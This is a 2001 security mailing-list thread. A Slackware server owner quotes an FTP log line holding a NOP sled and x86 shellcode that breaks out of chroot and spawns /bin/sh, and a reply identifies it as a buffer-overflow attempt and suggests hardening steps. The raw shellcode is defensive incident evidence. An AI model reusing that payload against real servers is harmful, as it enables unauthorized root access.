Security Incidents mailing list archives
Re: Linux ftpd
From: centipede <centiped () netvision net il>
Date: Sat, 09 Jun 2001 19:25:41 +0300
Simple. another intrusion from APNIC... the swamp... It's a buffer overflow exploit they were trying to run on your ftp server. Whether they succeeded or not I cannot say. There's a lot to be done:- D'ya really need those anonymous connections ? If not, shut the door close.
- D'ya use the latest version of your server ?- D'ya employ any packet filtering device ? If you do, block the swamp out... - Use TCP Wrapper to limit connections from known IPs.
centipede. mrcbis () tin it wrote:
I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as office-server; we have an internet-connection in dial-up to an ISP near us. Today I was looking into log-files, I found, in /var/log/messages the following message: Jun 3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM 202.239.131.55 [2 02.239.131.55], <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C 0>1 <DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C D> <80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8 D>^^H <B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE<C8><88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1 <DB> <B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11 repeated twice within few minutes. I think it was an intrusion attempt. My linux-box is connected to the internet with dynamic-ip-address. Cansomeone help me ? Best regardsMarco Bisio
Current thread:
- Linux ftpd mrcbis (Jun 09)
- Re: Linux ftpd Sam Mingolelli (Jun 09)
- Re: Linux ftpd Przemyslaw Frasunek (Jun 09)
- Re: Linux ftpd centipede (Jun 09)
- Re: Linux ftpd Sam Mingolelli (Jun 09)